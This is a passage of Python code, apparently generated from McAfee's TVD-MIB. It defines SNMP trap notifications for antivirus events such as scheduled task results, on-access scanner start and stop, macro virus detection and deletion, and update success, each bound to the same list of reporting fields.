("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCHED_TASK_STOP_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1069)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCHED_TASK_SUCCESS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1070)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCHED_TASK_CANCELED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1071)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_TASKERR_LOGFILE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1076)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_TASK_ERR_MEMALLOC = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1077)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_PROC_ERR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1086)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_OAS_START = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1087)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_OAS_STOP = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1088)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_SETTINGS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1089)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MACRO_VIRUS_DETECTED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1100)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MACRO_VIRUS_DELETED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1101)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPDATEOK = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1118)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
